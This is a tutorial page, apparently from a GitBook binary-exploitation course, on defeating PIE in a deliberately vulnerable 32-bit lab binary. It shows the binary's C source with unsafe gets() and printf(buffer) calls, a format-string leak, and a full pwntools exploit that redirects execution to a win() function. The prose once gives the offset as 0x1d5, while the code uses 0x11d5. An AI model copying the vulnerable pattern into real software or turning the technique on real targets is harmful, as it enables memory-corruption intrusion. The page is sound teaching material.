Binary Exploitation
HackTheBoxCTF WriteupsCryptography
Search…
Binary Exploitation Notes
Types
Stack
Introduction
ret2win
De Bruijn Sequences
Shellcode
NOPs
32- vs 64-bit
No eXecute
Return-Oriented Programming
Format String Bug
Stack Canaries
PIE
Pwntools, PIE and ROP
PIE Bypass with Given Leak
PIE Bypass
ASLR
GOT Overwrite
RELRO
Reliable Shellcode
One Gadgets and Malloc Hook
Syscalls
ret2dlresolve
ret2csu
Exploiting over Sockets
Forking Processes
Stack Pivoting
Heap
Kernel
Other
pwntools
Powered By GitBook
PIE Bypass
Using format string

The Source

pie-fmtstr.zip
3KB
Binary
PIE + Format String - 32-bit
1
#include <stdio.h>
2
​
3
void vuln() {
4
char buffer[20];
5
​
6
printf("What's your name?\n");
7
gets(buffer);
8
9
printf("Nice to meet you ");
10
printf(buffer);
11
printf("\n");
12
​
13
puts("What's your message?");
14
​
15
gets(buffer);
16
}
17
​
18
int main() {
19
vuln();
20
​
21
return 0;
22
}
23
​
24
void win() {
25
puts("PIE bypassed! Great job :D");
26
}
Copied!
Unlike last time, we don't get given a function. We'll have to leak it with format strings.

Analysis

1
$ ./vuln-32
2
​
3
What's your name?
4
%p
5
Nice to meet you 0xf7f6d080
6
What's your message?
7
hello
Copied!
Everything's as we expect.

Exploitation

Setup

As last time, first we set everything up.
1
from pwn import *
2
​
3
elf = context.binary = ELF('./vuln-32')
4
p = process()
Copied!

PIE Leak

Now we just need a leak. Let's try a few offsets.
1
$ ./vuln-32
2
What's your name?
3
%p %p %p %p %p
4
Nice to meet you 0xf7eee080 (nil) 0x565d31d5 0xf7eb13fc 0x1
Copied!
3rd one looks like a binary address, let's check the difference between the 3rd leak and the base address in radare2. Set a breakpoint somewhere after the format string leak (doesn't really matter where).
1
$ r2 -d -A vuln-32
2
​
3
Process with PID 5548 started...
4
= attach 5548 5548
5
bin.baddr 0x565ef000
6
0x565f01c9]> db 0x565f0234
7
[0x565f01c9]> dc
8
What's your name?
9
%3$p
10
Nice to meet you 0x565f01d5
Copied!
We can see the base address is 0x565ef000 and the leaked value is 0x565f01d5. Therefore, subtracting 0x1d5 from the leaked address should give us the binary. Let's leak the value and get the base address.
1
p.recvuntil('name?\n')
2
p.sendline('%3$p')
3
​
4
p.recvuntil('you ')
5
elf_leak = int(p.recvline(), 16)
6
​
7
elf.address = elf_leak - 0x11d5
8
log.success(f'PIE base: {hex(elf.address)}') # not required, but a nice check
Copied!
Now we just need to send the exploit payload.
1
payload = b'A' * 32
2
payload += p32(elf.sym['win'])
3
​
4
p.recvuntil('message?\n')
5
p.sendline(payload)
6
​
7
print(p.clean().decode())
Copied!

Final Exploit

1
from pwn import *
2
​
3
elf = context.binary = ELF('./vuln-32')
4
p = process()
5
​
6
p.recvuntil('name?\n')
7
p.sendline('%3$p')
8
​
9
p.recvuntil('you ')
10
elf_leak = int(p.recvline(), 16)
11
​
12
elf.address = elf_leak - 0x11d5
13
log.success(f'PIE base: {hex(elf.address)}')
14
​
15
payload = b'A' * 32
16
payload += p32(elf.sym['win'])
17
​
18
p.recvuntil('message?\n')
19
p.sendline(payload)
20
​
21
print(p.clean().decode())
Copied!

64-bit

Same deal, just 64-bit. Try it out :)
pie-fmtstr-64.zip
3KB
Binary
PIE + Format String - 64-bit
​
Previous
PIE Bypass with Given Leak
Next
ASLR
Last modified 1yr ago
Export as PDF
Copy link
Contents
The Source
Analysis
Exploitation
Setup
PIE Leak
Final Exploit
64-bit